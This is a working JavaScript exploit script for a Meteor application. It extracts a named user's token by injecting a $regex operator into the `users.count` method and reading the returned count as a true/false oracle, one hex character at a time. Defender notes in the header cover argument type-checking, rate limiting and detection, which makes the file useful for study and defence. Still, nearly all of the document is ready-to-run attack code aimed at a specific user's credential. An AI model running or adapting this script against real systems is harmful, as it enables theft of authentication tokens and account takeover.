Exfiltrate data via vulnerable Meteor method
/**
 * Recovers one field of a user document character by character through the
 * `users.count` Meteor method, using only the count the method returns.
 *
 * The client sends a selector object instead of plain strings: `field` is
 * matched with a `$regex` operator anchored at the start of the value, so a
 * count of 0 versus non-0 reveals whether the guessed prefix is correct.
 *
 * Defender notes.
 * NOTE(review): the server-side method is not shown here; the points below
 * assume it passes the client-supplied object into a collection query
 * unchanged. Confirm against the method's source.
 *  - Type-check every method argument (e.g. `check(value, String)`) so that
 *    operator objects such as `{$regex: ...}` are rejected before querying;
 *    the `audit-argument-checks` package flags methods that skip this.
 *  - Build the selector on the server from validated scalars and never let
 *    the caller choose which field is queried.
 *  - For detection, look for rapid runs of calls to one method whose
 *    arguments contain `$`-prefixed keys; `DDPRateLimiter` can throttle them.
 *
 * @param {string} user - Value sent as the `username` part of the selector.
 * @param {string} field - Name of the document field being matched.
 * @param {string[]} alphabet - Candidate characters, tried in order.
 * @param {string} [data=''] - Prefix confirmed so far.
 * @param {number} [index=0] - Position in `alphabet` of the current candidate.
 */
(function exploit(user, field, alphabet, data = '', index = 0) { | |
// The second argument is an object, so `[field]` carries a query operator
// rather than a literal value. `err` is accepted by the callback but never inspected.
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => { | |
console.log('^' + data + alphabet[index] + '.*', res); | |
// A count of 0 means the candidate did not match; any other result is
// treated as a match and the candidate is appended to the prefix.
if (res == 0) { | |
index++; | |
} else { | |
data += alphabet[index]; | |
index = 0; | |
} | |
// Every candidate was rejected at this position: report the prefix and stop.
if (index >= alphabet.length) { | |
console.log("Done", data); | |
return; | |
} | |
// The next call is queued with no delay argument, so requests follow each
// other as fast as responses arrive. There is no client-side pacing.
setTimeout(() => { | |
exploit(user, field, alphabet, data, index); | |
}); | |
}); | |
// Invocation from the listing: the alphabet is the lowercase hex digits, so the
// target value is presumably a hex string.
})('kertojasoo', 'token', '0123456789abcdef'.split('')); |